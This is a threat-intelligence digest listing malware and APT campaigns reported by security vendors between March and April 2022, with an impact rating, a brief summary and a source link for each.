Intel Name:: FFDroider Stealer Targeting Social Media Platforms

Date of Scan:: 2022-04-11

Impact:: LOW

Summary:: Researchers from Zscaler have discovered many new types of stealer malwares across different attack campaigns including a novel windows based malware creating a registry key dubbed FFDroider which is designed to send stolen credentials and cookies to C&C server.

Source: https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users

Intel Source:: CERT-UA

Intel Name:: UAC-0010 group/Armageddon targeting Ukraine government

Date of Scan:: 2022-04-08

Impact:: MEDIUM

Summary:: Ukraine’s Computer Emergency Response Team (CERT-UA) revealed on Monday a string of phishing emails that they’ve linked to a Russian state-sponsored actor called Armageddon. The attacks baited Ukrainian and Latvian government officials with information concerning the war between Ukraine and Russia.

Source: https://cert.gov.ua/article/39138 https://therecord.media/ukrainian-cert-details-russia-linked-phishing-attacks-targeting-government-officials/

Intel Source:: Fortinet

Intel Name:: Remcos RAT phishing campaign

Date of Scan:: 2022-04-08

Impact:: LOW

Summary:: Researchers from FortiGuard Labs share their analysis of the Remcos RAT being used by malicious actors to control victims’ devices delivered by a phishing campaign.

Source: https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing

Intel Source:: Recorded Future

Intel Name:: Chinese APT targets Indian Powegrid

Date of Scan:: 2022-04-08

Impact:: MEDIUM

Summary:: Researchers from Recorded Future finds continued targeting of the Indian power grid by Chinese state-sponsored activity group - likely intended to enable information gathering surrounding critical infrastructure systems.

Source: https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf

Intel Source:: CERT-UA

Intel Name:: UAC-0010 group/Armageddon targeting European Union institutions

Date of Scan:: 2022-04-08

Impact:: MEDIUM

Summary:: Ukraine’s Computer Emergency Response Team (CERT-UA) revealed on Monday a string of phishing emails that they’ve linked to a Russian state-sponsored actor called Armageddon. The attacks baited Ukrainian and Latvian government officials with information concerning the war between Ukraine and Russia.

Source: https://cert.gov.ua/article/39086 https://www.bleepingcomputer.com/news/security/ukraine-russian-armageddon-phishing-targets-eu-govt-agencies/

Intel Source:: Avast

Intel Name:: Parrot TDS takes over compromised websites

Date of Scan:: 2022-04-08

Impact:: MEDIUM

Summary:: Avast researchers has published a report stating that a new traffic direction system (TDS) called Parrot has been spotted leveraging tens of thousands of compromised websites to launch further malicious campaigns. The TDS has infected various web servers hosting more than 16 500 websites ranging from adult content sites personal websites university sites and local government sites.

Source: https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/

Intel Source:: Cybereason

Intel Name:: Operation Bearded Barbie

Date of Scan:: 2022-04-08

Impact:: MEDIUM

Summary:: Researchers from Cyberreason discovered a new APT-C-23 campaign targeting a group of high-profile Israeli targets working for sensitive defense law enforcement and emergency services organizations. The investigation revealed that APT-C-23 has effectively upgraded its malware arsenal with new tools dubbed Barb(ie) Downloader and BarbWire Backdoor.

Source: https://www.cybereason.com/blog/operation-bearded-barbie-apt-c-23-campaign-targeting-israeli-officials#iocs

Intel Source:: ISC.SANS

Intel Name:: Windows MetaStealer Malware

Date of Scan:: 2022-04-07

Impact:: MEDIUM

Summary:: Researchers at SANS has analysed 16 sampled of Excel files submitted to VirusTotal on 30-03-2022 these Excel files are distributed as Email attachments. Post-infection traffic triggers signatures for Win32/MetaStealer Related Activity.

Source: https://isc.sans.edu/diary/rss/28522

Intel Source:: McAfee

Intel Name:: Scammers are Exploiting Ukraine Donations

Date of Scan:: 2022-04-07

Impact:: LOW

Summary:: McAfee Researchers has identified some malicious sites and emails used by attackers to lure netizens on cryptocurrency donation scam.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/scammers-are-exploiting-ukraine-donations/

Intel Source:: Mandiant

Intel Name:: Evolution of FIN7 group

Date of Scan:: 2022-04-07

Impact:: MEDIUM

Summary:: Mandiant published their research on the evolution of FIN7 from both historical and recent intrusions and describes the process of merging eight previously suspected UNC groups into FIN7. The researchers also highlighted notable shifts in FIN7 activity over time including their use of novel malware incorporation of new initial access vectors and shifts in monetization strategies.

Source: https://www.mandiant.com/resources/evolution-of-fin7

Intel Source:: Cisco Talos

Intel Name:: New AsyncRAT campaign features 3LOSH crypter

Date of Scan:: 2022-04-07

Impact:: MEDIUM

Summary:: Cisco Talos Intelligence Group discovered ongoing malware distribution campaigns are using ISO disk images to deliver AsyncRAT and other commodity malware to victims. They found that these campaigns appear to be linked to a new version of the 3LOSH crypter.

Source: https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html

Intel Source:: Morphisec

Intel Name:: CaddyWiper Malware- New Analysis

Date of Scan:: 2022-04-07

Impact:: MEDIUM

Summary:: Researchers from Morphisec shares a new analysis on Caddywiper malware which has surfaced as the fourth destructive wiper attacking Ukrainian infrastructure. Caddywiper destroys user data partitions information from attached drives and has been spotted on several dozen systems in a limited number of organizations.

Source: https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine

Intel Source:: Symantec

Intel Name:: Cicada/APT10 new espionage campaign

Date of Scan:: 2022-04-07

Impact:: MEDIUM

Summary:: Researchers at Symantec has discovered an espionage campaign by Chinese APT group called APT10/Cicada. Victims identified in this campaign include government legal religious and non-governmental organizations (NGOs) in multiple countries around the world including in Europe Asia and North America.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks

Intel Source:: ASEC

Intel Name:: Malicious Word Documents Using MS Media Player

Date of Scan:: 2022-04-07

Impact:: LOW

Summary:: ASEC Researchers has analysed a malicious word file that is also being distributed with text that impersonates AhnLab. The Word files downloaded another Word file containing malicious VBA macro via the external URL and run it. The downloaded word file used the Windows Media Player() function instead of AutoOpen() to automatically run the VBA macro.

Source: https://asec.ahnlab.com/en/33477/

Intel Source:: Malwarebytes

Intel Name:: Colibri Loader campaign delivering the Vidar Stealer

Date of Scan:: 2022-04-07

Impact:: LOW

Summary:: Researchers from MalwareBytes recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as final payload that uses a clever persistence technique that combines Task Scheduler and PowerShell.

Source: https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/

Intel Source:: Trend Micro

Intel Name:: BLISTER & SocGholish loaders delivering LockBit Ransomware

Date of Scan:: 2022-04-07

Impact:: MEDIUM

Summary:: Researchers from TrendMicro made a recent discovery in which BLISTER and SocGholish which are loaders and are known for evasion tactics were involved in a campaign which were used to deliver LockBit ransomware.

Source: https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

Intel Source:: Cofense

Intel Name:: New Rat campaign leverages Tax Season

Date of Scan:: 2022-04-06

Impact:: LOW

Summary:: Cofense Phishing Defense Center team has discovered a tatic that spoofs the U.S. Internal Revenue Service (IRS) to download malware onto user systems. This campaign leverages Netsupport Manager a troubleshooting and screen control program as a malicious remote access trojan (RAT) the threat actor employs to remotely enter user systems.

Source: https://cofense.com/blog/rat-campaign-looks-to-take-advantage-of-the-tax-season

Intel Source:: Malwarebytes

Intel Name:: New UAC-0056 Group activity

Date of Scan:: 2022-04-06

Impact:: MEDIUM

Summary:: Researchers from Intezer Labs shared that UAC-0056 (TA471 SaintBear UNC2589) have been launching targeted spear phishing campaigns using spoofed Ukrainian governmental email addresses to deliver the Elephant malware framework written in Go.

Source: https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/ https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/

Intel Source:: SecureList

Intel Name:: Lazarus Group New Campaign

Date of Scan:: 2022-04-06

Impact:: LOW

Summary:: Researchers at SecureList has discovered a Trojanized DeFi application was used to deliver backdoor by Lazarus Group. The DeFi application contains a legitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet but also implants a malicious file when executed.

Source: https://securelist.com/lazarus-trojanized-defi-app/106195/

Intel Source:: DFIR Report

Intel Name:: Stolen Image Evidence Campaign

Date of Scan:: 2022-04-06

Impact:: MEDIUM

Summary:: Researchers at DFIR Report has identified a single Conti ransomware deployment from December that appears to be part of a larger campaign. The attack utilized IcedID a well known banking trojan was delivered via the 'Stolen Images Evidence' email campaign.

Source: https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/

Intel Source:: Fortinet

Intel Name:: Mirai campaign updated its arsenal of exploits

Date of Scan:: 2022-04-06

Impact:: MEDIUM

Summary:: Researchers at Fortinet Labs has identified that the Beastmode Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month with three targeting various models of TOTOLINK routers.

Source: https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign

Intel Source:: Qianxin

Intel Name:: VajraEleph (APT-Q-43) group New campaign

Date of Scan:: 2022-04-05

Impact:: LOW

Summary:: The mobile security team of Qianxin Technology HK Co. Limited Virus Response Center identified the VajraEleph (APT-Q-43) group has been carrying out targeted military espionage intelligence activities against the Pakistani military.

Source: https://mp.weixin.qq.com/s/B0ElRhbqLzs-wGQh79fTww

Intel Source:: Morphisec

Intel Name:: Remcos Rat Phishing Campaign

Date of Scan:: 2022-04-05

Impact:: MEDIUM

Summary:: Morphisec Labs has detected a new wave of Remcos RAT infections being spread through phishing emails masquerading as payment remittances sent from financial institutions.

Source: https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain

Intel Source:: Morphisec

Intel Name:: Mars InfoStealer new operation

Date of Scan:: 2022-04-04

Impact:: MEDIUM

Summary:: Morphisec Labs team has analysed a campaign where the actor distributed Mars Stealer via cloned websites offering well-known software. Morphisec team has attributed this actor to a Russian national by looking at the screenshots and keyboard details from the extracted system.txt.

Source: https://blog.morphisec.com/threat-research-mars-stealer

Intel Source:: SentinelOne

Intel Name:: Hive Ransomware leveraging IPfuscation Technique

Date of Scan:: 2022-04-04

Impact:: MEDIUM

Summary:: Researchers at SentinelOne have discovered a new obfuscation technique used by the Hive ransomware gang which involves IPv4 addresses and a series of conversions that eventually lead to downloading a Cobalt Strike beacon.

Source: https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/

Intel Source:: ASEC

Intel Name:: North Korea related files distributed via malicious VB Scripts

Date of Scan:: 2022-04-04

Impact:: LOW

Summary:: ASEC Researchers has analysed a phishing emails related to North Korea and a compressed file is attached. Referring to writing a resume induce execution of the attached file. A malicious VBS script file exists inside the compressed file.

Source: https://asec.ahnlab.com/ko/33141/

Intel Source:: Trellix

Intel Name:: New PlugX variant used by Chinese APT group

Date of Scan:: 2022-04-04

Impact:: MEDIUM

Summary:: Researchers at Trellix has discovered a new variant of PlugX malware named 'Talisman'. The new variant follows usual execution process by abusing a signed and benign binary which loads a modified DLL to execute shellcode. The shellcode is used to decrypt the PlugX malware which then serves as a backdoor with plug-in capabilities.

Source: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html

Intel Source:: SentinelOne

Intel Name:: Acid Rain wiper malware targets Viasat KA-SAT modems

Date of Scan:: 2022-04-04

Impact:: MEDIUM

Summary:: Sentinel Labs researchers a new modern wiper AcidRain which have beeb targeting Europe and on Viasat KA-SAT modems. This wiper is an ELF MIPS malware designed to wipe modems and routers.

Source: https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/

Intel Source:: Checkpoint

Intel Name:: State sponsored groups leveraging RU-UA conflict

Date of Scan:: 2022-04-04

Impact:: MEDIUM

Summary:: Researchers from CheckPoint provides an overview of several campaigns by different APT groups using the ongoing Russia-Ukraine war to increase the efficiency of their campaigns. They also discuss the victimology of these campaigns; the tactics used and provides technical analysis of the observed malicious payloads and malware specially crafted for this cyber-espionage.

Source: https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/

Intel Source:: Zscaler

Intel Name:: BlackGuard - new infostealer malware

Date of Scan:: 2022-04-04

Impact:: MEDIUM

Summary:: The Zscaler ThreatLabz team came across BlackGuard a sophisticated stealer currently being advertised as malware-as-a-service with a monthly price of $200. Researcher share their analysis of the techniques the Blackguard stealer uses to steal information and evade detection using obfuscation as well as techniques used for anti-debugging.

Source: https://www.zscaler.com/blogs/security-research/analysis-blackguard-new-info-stealer-malware-being-sold-russian-hacking

Intel Source:: Fortinet

Intel Name:: Spoofed Invoice delivering IcedID Trojan

Date of Scan:: 2022-04-01

Impact:: MEDIUM

Summary:: FortiGuard Labs encountered spearphishing campaign targeting a fuel company in Kyiv Ukraine. The email contains an attached zip file which also contains a invoice file claiming to be from another fuel company. IcedID trojan drop via main.dll in windows registry.

Source: https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id

Intel Source:: Securonix

Intel Name:: Spring4Shell Vulnerability

Date of Scan:: 2022-04-01

Impact:: HIGH

Summary:: Securonix Threat Research team has identified a currently unpatched zero-day vulnerability in Spring Core a widely used Java-based platform with cross platform support. Early details claim that the bug would allow full remote code execution (RCE) to affected systems.

Source: https://www.securonix.com/blog/detection-and-analysis-of-spring4shell/

Intel Source:: Fortinet

Intel Name:: Deep Panda APT group exploiting Log4shell

Date of Scan:: 2022-04-01

Impact:: MEDIUM

Summary:: FortiGuard Labs detected an opportunistic campaign by the Chinese nation-state “Deep Panda” APT group exploiting the Log4Shell vulnerability in VMware Horizon servers belonging to the financial academic cosmetics and travel industries.

Source: https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits

Intel Source:: Google

Intel Name:: Multiple APT groups targeting Eastern Europe

Date of Scan:: 2022-03-31

Impact:: MEDIUM

Summary:: Google TAG researchers has tracked 3 APT groups targeting government military organisations in Ukraine Kazakhstan Mongolia and NATO forces in Eastern Europe. All 3 APT groups conducting phishing campaigns to against the targets.

Source: https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/

Intel Source:: Cisco Talos

Intel Name:: Transparent Tribe targets Indian government and military

Date of Scan:: 2022-03-31

Impact:: MEDIUM

Summary:: Cisco Talos researchers has identified a new campaign by Transparent Tribe targeting Indian government and military bodies. The Threat actor is leveraging CrimsonRAT for infecting the victims.

Source: https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html

Intel Source:: Symantec

Intel Name:: Verblecon - A New Malware Loader

Date of Scan:: 2022-03-31

Impact:: LOW

Summary:: Symantec researchers has identifed a malware named Trojan.Verblecon which has being leveraged in attacks that appear to have installing cryptocurrency miners on infected machines as their end goals. However the capabilities of this malware indicate that it could be highly dangerous if leveraged in ransomware or espionage campaigns.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord

Intel Source:: Google

Intel Name:: Chromium Based Browser Vulnerability

Date of Scan:: 2022-03-31

Impact:: MEDIUM

Summary:: Google is urging users on Windows macOS and Linux to update Chrome builds to version 99.0.4844.84 following the discovery of a vulnerability that has an exploit in the wild.

Source: https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html

Intel Source:: ASEC

Intel Name:: Kimsuky distributing VB Script disguised as PDF Files

Date of Scan:: 2022-03-30

Impact:: LOW

Summary:: ASEC Researchers has identified an APT attacks by a group called Kimsuky using VB Script disguised as PDF files. Upon running the script file with the VBS extension the malware runs the innocuous PDF file that exists internally to trick the user into thinking that they opened an innocuous document file and uses a malicious DLL file to leak information.

Source: https://asec.ahnlab.com/en/33032/

Intel Source:: ASEC

Intel Name:: BitRAT malware disguised as office Installer

Date of Scan:: 2022-03-30

Impact:: LOW

Summary:: ASEC REsearchers has analysed a BitRAT malware sample which is being distributed as office installer with different files. The malware is being distributed actively via file-sharing websites such as Korean webhards.

Source: https://asec.ahnlab.com/en/33024/

Intel Source:: Cisco

Intel Name:: Emotet New IoC and New Pattern

Date of Scan:: 2022-03-30

Impact:: MEDIUM

Summary:: Cisco conducted research to find new Emotet IOCs and URL patterns related to this new wave in Emotet activity since it’s re-emergence in November 2021. Cisco researchers summarizes the Emotet (Geodo/Heodo) malware threat it’s lifecycle and typical detectable patterns.

Source: https://blogs.cisco.com/security/emotet-is-back

Intel Source:: Intezer

Intel Name:: New Conversation Hijacking Campaign Delivering IcedID

Date of Scan:: 2022-03-29

Impact:: MEDIUM

Summary:: Researcher from Intezer provides a technical analysis of a new campaign which initiates attacks with a phishing email that uses conversation hijacking to deliver the IcedID malware.

Source: https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/

Intel Source:: Trend Micro

Intel Name:: Purple Fox using New variant of FatalRat

Date of Scan:: 2022-03-29

Impact:: MEDIUM

Summary:: Trend Micro Research were tracking an threat actor named 'Purple Fox' and their activities. Researchers identified Purple Fox’s new arrival vector and the early access loaders we believe are associated with the intrusion set behind this botnet. The operators are updating their arsenal with new malware including a variant of the remote access trojan FatalRAT that they seem to be continuously upgrading.

Source: https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html

Intel Source:: Juniper

Intel Name:: Muhstik Gang targets Redis Servers

Date of Scan:: 2022-03-28

Impact:: MEDIUM

Summary:: Researchers at Juniper Threat Labs has revealed an attack that targets Redis Servers using a recently disclosed vulnerability namely CVE-2022-0543. This vulnerability exists in some Redis Debian packages. The payload used is a variant of Muhstik bot that can be used to launch DDOS attacks.

Source: https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers

Intel Source:: Zscaler

Intel Name:: Conti Ransomware new update

Date of Scan:: 2022-03-28

Impact:: MEDIUM

Summary:: Researchers at Zscaler ThreatLabz has been following Conti Ransomware group and identified an updated version of Conti ransomware as part of the global ransomware tracking efforts which includes improved file encryption introduced techniques to better evade security software and streamlined the ransom payment process.

Source: https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks

Intel Source:: Fortinet

Intel Name:: Tax Season and Refugee war scams delivering Emotet

Date of Scan:: 2022-03-25

Impact:: MEDIUM

Summary:: FortiGuard Labs Research team has anlaysed emails related to tax season and the Ukrainian conflict. The Phishing emails are attributed to an unfamous malware called 'Emotet' are affecting Windows platform and compromised machines are under the control of the threat actor further stole personally identifiable information (PII) credential theft monetary loss etc.

Source: https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams

Intel Source:: Morphisec

Intel Name:: JSSLoader RAT delivered through XLL Files

Date of Scan:: 2022-03-25

Impact:: LOW

Summary:: Morphisec labs has discovered a new variant of JSSLoader RAT. JSSLoader is a small very capable .NET remote access trojan (RAT). Its capabilities include data exfiltration persistence auto-updating additional payload delivery and more. Moreover attacker are now using .XLL files to deliver and obfuscated version of JSSLoader.

Source: https://blog.morphisec.com/new-jssloader-trojan-delivered-through-xll-files

Intel Source:: Avast

Intel Name:: Operation Dragon Castling

Date of Scan:: 2022-03-25

Impact:: LOW

Summary:: Researchers from Avast found an APT campaign dubbed Operation Dragon Castling which has been targeting betting companies in Southeast Asian countries.The campaign has similarities with several old malware samples used by an unspecified Chinese-speaking APT group.

Source: https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/

Intel Source:: SentinelOne

Intel Name:: Chinese APT Scarab targets Ukraine

Date of Scan:: 2022-03-25

Impact:: MEDIUM

Summary:: Researchers at Sentinel Labs has further analysed the alert #4244 released by Ukrainian CERT on 22nd March 2022 which states about the malicious activity of UAC-0026 threat group. Sentinel team has confirmed UAC-0026 attribution with Chinese APT group called Scarab.

Source: https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/

Intel Source:: Confiant

Intel Name:: Crypto Phishing

Date of Scan:: 2022-03-24

Impact:: LOW

Summary:: Researcher at Confiant has looked at several chains that start with an ad and end with cryptocurrency theft usually via phishing.

Source: https://blog.confiant.com/a-whirlwind-tour-of-crypto-phishing-8628da0a9e38

Intel Source:: Google

Intel Name:: Operation DreamJob and AppleJeus

Date of Scan:: 2022-03-24

Impact:: MEDIUM

Summary:: Researchers from google discovered two new North Korean backed threat actors exploiting a remote code execution vulnerability in Chrome CVE-2022-0609.hese groups' activity has been publicly tracked as Operation Dream Job and Operation AppleJeus. These campaigns have been targeting U.S based organizations.

Source: https://blog.google/threat-analysis-group/countering-threats-north-korea/

Intel Source:: ISC.SANS

Intel Name:: New variants of Arkei Stealer

Date of Scan:: 2022-03-24

Impact:: LOW

Summary:: Researchers at SANS InfoSec Diary blog has analysed Vidar Oski and Mars stealer variants of Arkei Stealer malware. Researchers also found legitimate DLL files has been used by Vidar Oski and Mars variants which are hosted on the same C2 server.

Source: https://isc.sans.edu/diary.html?date=2022-03-23

Intel Source:: Trustwave

Intel Name:: Vidar Malware hidden in Microsoft Help file

Date of Scan:: 2022-03-24

Impact:: MEDIUM

Summary:: Trustwave Spider Labs researchers has detected a vidar malware based phishing campaign that abuses Microsoft HTML help files. Vidar is Windows spyware and an information stealer available for purchase by cybercriminals. Vidar can harvest OS & user data online service and cryptocurrency account credentials and credit card information.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/

Intel Source:: eSentire

Intel Name:: Conti Ransomware Affiliate Exposed

Date of Scan:: 2022-03-24

Impact:: MEDIUM

Summary:: Researchers at eSentire has been tracking the movements of Conti gang for over two years and now publishing new set of indicators which are currently being used by Conti affiliate. Researchers analysis also focus on the infrastructre used by the gang.

Source: https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

Intel Source:: deepinstinct

Intel Name:: Arid Viper using Arid Gopher malware

Date of Scan:: 2022-03-24

Impact:: MEDIUM

Summary:: Researchers from Deep Instinct's Threat Research team discovered a never before seen Micropsia malware dubbed Arid Gropher and is attributed to Arid Viper.

Source: https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant

Intel Source:: Avast

Intel Name:: Meris and TrickBot joined Hands

Date of Scan:: 2022-03-24

Impact:: MEDIUM

Summary:: As per Avast researchers Meris backdoor and Trickbot have joined hands. The botnet is known to exploit a known vulnerability in the Winbox component of MikroTik routers (CVE-2018-14847) enabling the attackers to gain unauthenticated remote administrative access to any affected device.

Source: https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/

Intel Source:: Zscaler

Intel Name:: Midas Ransomware - A Thanos Ransomware variant

Date of Scan:: 2022-03-24

Impact:: LOW

Summary:: Researchers at Zscaler has analysed variants of Thanos ransomware and identified the shifting of tactics by the ransomware in 2021. Thanos ransomware was first identified in Feb 2020 as a RaaS on darkweb. In 2021 Thanos source code got leaked after that lot of variants has been identified by the researchers. One of the latest variant is Midas.

Source: https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants

Intel Source:: Avast

Intel Name:: Password stealer disguised as private Fortnite server

Date of Scan:: 2022-03-24

Impact:: LOW

Summary:: Researchers at Avast have identified a password stealer malware disguised as private Fortnite server where users can meet for a private match and use skins for free. The malware is being heavily propagated on communications platform Discord.

Source: https://blog.avast.com/password-stealer-disguised-as-fortnite-server-spreading-on-discord

Intel Source:: WeLiveSecurity

Intel Name:: Mustang Panda deploying new Hodur Malware

Date of Scan:: 2022-03-23

Impact:: MEDIUM

Summary:: A new cyber espionage campaign has been discovered by researchers from ESET in which APT group Mustang Panda who is China linked was deploying Hodur malware. The victims are from east and southeast Asia.

Source: https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/

Intel Source:: CERT-UA

Intel Name:: Phishing Campaign using QR code targets Ukraine

Date of Scan:: 2022-03-23

Impact:: MEDIUM

Summary:: CERT UA discovered the distribution of e-mails that mimic messages from UKR.NET and contain a QR code encoding a URL created using one of the URL-shortener services and it was attributed with low confidence to APT28.

Source: https://cert.gov.ua/article/37788

Intel Source:: ASEC

Intel Name:: Document-borne APT attack targeting Carbon emissions companies

Date of Scan:: 2022-03-23

Impact:: LOW

Summary:: ASEC Team has analysed a malicious word document titled '**** Carbon Credit Institution.doc' which user downloaded thorugh a web browser. The team identified the malicious document from the logs collected by their Smart Defense tool. The malicious document comes with macro code and it is likely that its internal macro code runs wscript.ex.

Source: https://asec.ahnlab.com/en/32822/

Intel Source:: ASEC

Intel Name:: ClipBanker Malware disguised as Malware Creation Tool

Date of Scan:: 2022-03-23

Impact:: LOW

Summary:: ASEC Team has indentified a ClipBanker malware which disguised as malware creation tool. ClipBanker malware monitors the clipbooard of the infected system and if the malware copies a string for a coin wallet address then changes its to the address designated by the attacker.

Source: https://asec.ahnlab.com/en/32825/

Intel Source:: CERT-UA

Intel Name:: Vermin (UAC-0020) targets Ukraine Govt using Spectr malware

Date of Scan:: 2022-03-23

Impact:: MEDIUM

Summary:: On March 17 CERT-UA found an active spear phishing campaign delivering SPECTR malware. The campaign was initiated by Vermin aks UAC-0020 who are associated with Luhansk People’s Republic (LPR).

Source: https://cert.gov.ua/article/37815 https://socprime.com/blog/vermin-uac-0020-hacking-collective-hits-ukrainian-government-and-military-with-spectr-malware/

Intel Source:: Cyble

Intel Name:: Clipper malware disguised as AvD Crypto Stealer

Date of Scan:: 2022-03-23

Impact:: LOW

Summary:: Researchers at Cyble has discovered a new malware dubbed as 'AvD crypto stealer' but it is does not function as crypto stealer. However it disguised variant of well-known clipper malware and it has capability of read and edit any text copied by vicitm.

Source: https://blog.cyble.com/2022/03/22/hunters-become-the-hunted/

Intel Source:: CERT-UA

Intel Name:: DoubleZero Destructive Malware targets Ukrainian firms

Date of Scan:: 2022-03-23

Impact:: MEDIUM

Summary:: On March 17 CERT-UA found presence of a destructive malware dubbed as DoubleZero targeting Ukrainian firms. The malware erases files and destroys certain registry branches on the infected machine.

Source: https://cert.gov.ua/article/38088 https://socprime.com/blog/doublezero-destructive-malware-used-in-cyber-attacks-at-ukrainian-companies-cert-ua-alert/

Intel Source:: CERT-UA

Intel Name:: UAC-0026 targets Ukraine by HeaderTIP malware

Date of Scan:: 2022-03-23

Impact:: MEDIUM

Summary:: CERT UA identified yet another nefarious malware dubbed headerTip which leveraged to drop additional DLL files to the infected instance and this has been targeting the nfrastructure of Ukrainian state bodies and organizations across the country.

Source: https://cert.gov.ua/article/38097

Intel Source:: DFIR Report

Intel Name:: APT35 Automates Initial Access Using ProxyShell

Date of Scan:: 2022-03-22

Impact:: MEDIUM

Summary:: Researchers at DFIR report observed an intrusion attributed to APT35 exploiting ProxyShell vulnerabilities followed by some further post-exploitation activity which included web shells credential dumping and specialized payloads.

Source: https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/

Intel Source:: ASEC

Intel Name:: Malware disguised as a Windows Help File

Date of Scan:: 2022-03-22

Impact:: LOW

Summary:: ASEC Team has discovered a malware disguised as Windows Help File (*.chm) and targeting Korean users. The CHM File is complied HTML Help file which is executed via Microsoft HTML help executable program. After executing CHM File it downloads additional malicious files.

Source: https://asec.ahnlab.com/en/32800/

Intel Source:: CERT-UA

Intel Name:: UAC-0035/InvisiMole targeting Ukrainain government

Date of Scan:: 2022-03-22

Impact:: LOW

Summary:: CERT-UA identified cyberattacks being launched by the UAC-0035/InvisiMole threat group targeting Ukrainain government organisations using phishing campaigns. InvisiMole is likely a subgroup connected to the Russia-sponsored Gamaredon group.

Source: https://cert.gov.ua/article/37829

Intel Source:: Proofpoint

Intel Name:: Serpent Backdoor Targets French government firms

Date of Scan:: 2022-03-22

Impact:: MEDIUM

Summary:: ProofPoint researchers identified a targeted attack leveraging an open-source package installer Chocolatey to deliver a backdoor. The backdoor was dubbed as Serpent and target has been French firms in cinstruction and real estate.

Source: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain

Intel Source:: Arete

Intel Name:: SurTr Ransomware recent activity

Date of Scan:: 2022-03-22

Impact:: LOW

Summary:: Researchers from Arete investigated a security incident involving Surtr ransomware which made registry key change to the infected host to pay tribute to REvil group.

Source: https://areteir.com/surtr-ransomware-pays-tribute-to-revil/

Intel Source:: Trellix

Intel Name:: DarkHotel APT New Campaign

Date of Scan:: 2022-03-22

Impact:: LOW

Summary:: Trelix researchers discovered a first stage malicious campaign targeting luxury hotels in Macao China since last 5 months and the attack has been attributed to South Korean APT group DarkHotel.

Source: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html

Intel Source:: ASEC

Intel Name:: BitRAT distributed via webhards

Date of Scan:: 2022-03-22

Impact:: MEDIUM

Summary:: ASEC team has analysed a malware which is being distributed via webhards they identified malware as BitRAT. The attacker disguised the malware as Windows10 license verification tool and to lure the netizens attacker named the installer as 'New Quick Install Windows License Verification' One-click.

Source: https://asec.ahnlab.com/en/32781/

Intel Source:: STR

Intel Name:: Serpent Backdoor_Seeder_Queries_21/03/22

Date of Scan:: 2022-03-22

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Mandiant

Intel Name:: CAKETAP Rootkit deployed by UNC2891

Date of Scan:: 2022-03-21

Impact:: MEDIUM

Summary:: Security researchers from Mandiant came across a new Unix rootkit called CakeTap that was used to steal ATM banking data. This rootkit was leveraged by UNC2891.

Source: https://www.mandiant.com/resources/unc2891-overview

Intel Source:: Dragos

Intel Name:: CONTI & EMOTET Infrastructure

Date of Scan:: 2022-03-21

Impact:: LOW

Summary:: Researchers at Dragos has observed consistent network communication between the Emotet ransomware group and automotive manufacturers across North America and Japan which is suspected to be controlled by the Conti ransomware.

Source: https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/

Intel Source:: Blackberry

Intel Name:: LokiLocker RaaS Targets Windows Systems

Date of Scan:: 2022-03-21

Impact:: MEDIUM

